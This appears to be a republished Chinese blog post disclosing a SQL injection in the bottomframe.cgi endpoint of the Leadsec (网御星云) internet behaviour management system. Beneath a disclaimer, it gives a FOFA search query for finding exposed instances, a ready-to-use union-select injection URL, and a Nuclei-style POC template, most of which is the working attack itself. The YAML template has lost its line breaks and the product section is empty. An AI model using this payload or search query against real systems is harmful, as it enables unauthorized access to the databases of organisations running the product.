本文主要是介绍网御星云-上网行为管理系统bottomframe.cgi接口存在SQL注入,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
一、免责声明:
本次文章仅限个人学习使用,如有非法用途均与作者无关,且行且珍惜;由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号望雪阁及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除整改并向您致以歉意。谢谢!
二、产品介绍:
三、资产梳理:
app="网御星云-上网行为管理系统"
四、漏洞复现:
http://xxx.xxx.xxx/bottomframe.cgi?user_name=%27))%20union%20select%20database()%23
五、POC:
id: Leadsec_ACM_sql
info:name: Leadsec_ACM_sqlauthor: joyboyseverity: criticaldescription: http://xxx.xxx.xxx/bottomframe.cgi?user_name=%27))%20union%20select%20database()%23metadata:max-request: 1fofa-query: app="网御星云-上网行为管理系统"verified: truetags: Leadsec_ACMrequests:- raw:- |-GET /bottomframe.cgi?user_name=%27))%20union%20select%20database()%23 HTTP/1.1Host: {{Hostname}}req-condition: truematchers:- type: dslcondition: anddsl:- 'contains((body), "NTC") && status_code == 200'
这篇关于网御星云-上网行为管理系统bottomframe.cgi接口存在SQL注入的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!